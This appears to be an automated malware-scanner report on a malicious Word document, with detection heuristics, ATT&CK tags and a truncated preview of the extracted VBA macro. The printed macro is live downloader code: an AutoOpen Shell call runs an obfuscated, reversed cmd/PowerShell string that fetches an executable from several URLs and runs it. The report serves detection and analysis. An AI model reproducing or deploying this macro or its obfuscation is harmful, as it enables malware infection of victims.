MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample contains a VBA macro with an AutoOpen subroutine that utilizes the Shell() function. This function is used to execute a command, likely to download and run a secondary payload. The macro attempts to construct a command string that includes 'cmd /V:ON/s', indicating a command-line execution attempt.
Heuristics 6
-
ClamAV: Doc.Downloader.Pederr-6691327-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Pederr-6691327-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4852 bytes |
SHA-256: 0d1e901f8f0da5ab344392ce1886175704bfdfe7813e92098dd38a97d4a324b9 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "OZtosLnX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
Set sBdisU = joKqOi
Set IMOGk = kfIwWt
Set hqbUK = twcjD
Set swQUa = iFjMPu
Set DABpBi = puVnmp
Set LaiAkl = aSYTN
Set cPZwd = GnGDP
Set whzjC = KatsNT
Set SwGijd = vKvPSm
Shell YFZsHuzjH + miqlSuTLK + qmQTUIUSpjNi + DUkwjEQdoU, Format(0)
Set MKzbR = BPUJw
Set BtVlfQ = FDuiq
Set SBKZt = wUkklT
Set hPNwwi = vJSOPE
End Sub
Attribute VB_Name = "aNHwYTzHKBU"
Function YFZsHuzjH()
On _
Error _
Resume _
Next
Set joIwG = SizaTS
Set XtWRms = rzilu
Set HTbQn = iHAISk
Set oAiVa = LFDBjz
Set UvSJs = iKtAkq
jOtrSdZQrf = Format(Chr(10 + 14 + 1 + 18 + 56)) + "md /V^" + ":" + "^ON/" + Format(Chr(7 + 9 + 0 + 12 + 39)) + Format(Chr(3 + 4 + 0 + 5 + 22)) + "s^" + "e" + "^t Q" + "^j=" + " ^ ^ " + " " + " ^ ^ "
Set witMf = EpIrYE
Set rQcvw = owVqd
Set WhwIt = zAQTB
BZtsZvPD = "^ ^ " + "^ ^ ^ " + " }}^" + "{^h" + Format(Chr(10 + 14 + 1 + 18 + 56)) + "^t^a" + Format(Chr(10 + 14 + 1 + 18 + 56)) + "^" + "}^;ka^e" + "rb" + ";" + "^DvI" + "$"
Set KVdBaw = hTkoJ
Set DArTE = UnfmS
Set wOaLn = NYjwb
Set KJwsGn = QAHQS
ujQGs = "^ ^m" + "etI^-^e" + "^k^o" + "vn^I" + "^;)^" + "DvI^$ " + ",S" + "^U^m" + "^$(^e" + "^liFdao" + "^ln"
Set lpjZo = BhcQkB
Set RbIjuN = bnqof
RQMVq = "woD.m^K" + "d^" + "$^{yrt^" + "{)" + "^" + "GX"
Set aAnuwC = GsmSIb
Set WmPfij = iWASJ
zShaskjt = "v^$ " + "ni " + "^S^U" + "^m$(" + "h" + Format(Chr(10 + 14 + 1 + 18 + 56)) + "a^er^" + "of^;'ex" + "e^.'^+" + "^t^Un$"
Set JUzpBQ = GtibUP
Set FbHLUC = bTMSS
MnmlwZ = "+^'" + "^\" + "'^" + "+" + Format(Chr(10 + 14 + 1 + 18 + 56)) + "i^lb^" + "u^p^:" + "v" + "n^e^$" + "^" + "=^Dv^I$"
Set toQHdz = mSLZf
Set jzfNNp = EIUivo
Set HLskuv = BqVjts
Set uXkEdJ = OtSHHT
Set uWuiM = ahVwp
NSYlscpHp = "^;" + "'" + "676'^" + " " + "=^ tUn^" + "$^;" + ")'" + "^@'(^ti" + "^l^" + "p^" + "S.'" + "v^zq" + Format(Chr(10 + 14 + 1 + 18 + 56))
Set QzBLq = MwOScI
Set OYzpK = kZRiGl
mWPlCOJ = "^A^B^w" + "hq1/" + "mo" + Format(Chr(10 + 14 + 1 + 18 + 56)) + "^.gni^" + "k^d^ia"
Set WsuqRF = ofHTLl
Set FEZHL = ahRwEP
Set hawjD = Jiwwjq
Set irZwj = zfnRA
jFrZRfiQ = "r//^:p" + "^tt^h^" + "@ziIDLs" + "^MX^" + "o6/^m" + "o" + Format(Chr(10 + 14 + 1 + 18 + 56)) + "^.^de"
Set wskOR = aDtDZ
Set RHHIf = jZNpz
Set AJAioz = wFZiHa
EKhtwhPv = "ti^mi^" + "ls^ko" + "ob" + "^mur" + "t" + Format(Chr(10 + 14 + 1 + 18 + 56)) + "^eps" + "/" + "/^:p^tt" + "h^@A" + Format(Chr(7 + 9 + 0 + 12 + 39)) + "^" + "2fQu^x^" + "OP" + "^3/vvv" + "^"
Set zVYlVw = nmMDU
Set pqhBRH = JVEcC
Set SCHqsB = lwRSYQ
Set ZGTzj = AzVWTA
Set uELuq = LiGZp
jtaQWAtK = "w^w" + "/" + "ku.^" + "o" + Format(Chr(10 + 14 + 1 + 18 + 56)) + "^.b^e" + "^we" + "^ht4/" + "/^:^" + "pt^t^h" + "^@^"
YFZsHuzjH = jOtrSdZQrf + BZtsZvPD + ujQGs + RQMVq + zShaskjt + MnmlwZ + NSYlscpHp + mWPlCOJ + jFrZRfiQ + EKhtwhPv + jtaQWAtK
Set mlPwIQ = NHiZc
Set hrtEs = vUKqk
Set jHLYv = CBHvPd
Set pkiTjf = cfPkUj
Set tLSGK = qlPHb
End Function
Function miqlSuTLK()
On _
Error _
Resume _
Next
Set zVozG = qopFD
Set wilaS = WSmmqd
Set SkROId = qqHEC
Set piibMo = fSGbi
viMir = "xb" + "O^l^X" + "N^qX^" + "2^k/rf." + "t" + "pe" + Format(Chr(10 + 14 + 1 + 18 + 56)) + "no" + Format(Chr(10 + 14 + 1 + 18 + 56)) + "^" + "or" + "u^emo" + Format(Chr(10 + 14 + 1 + 18 + 56)) + "/"
Set NjzKu = GDilBR
OXTJVwzAIiW = "/:p^" + "tth^" + "@^" + "Hv^9xvu" + "^2y" + "jE/ri^"
Set YfwQAL = dpHCRP
Set XLhni = hkXvkG
Set niwKYC = SlAibz
VUvbCOEkzi = ".tn^ig" + "^a" + "^m" + "//:" + "pt^" + "th^'^" + "=G^Xv$" + "^;tn" + "^e^il" + Format(Chr(7 + 9 + 0 + 12 + 39)) + "^b" + "eW^"
Set crYizW = pZcfM
Set OowkOt = rCVsp
Set Skdmd = qkbwDG
rDoJmdo
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.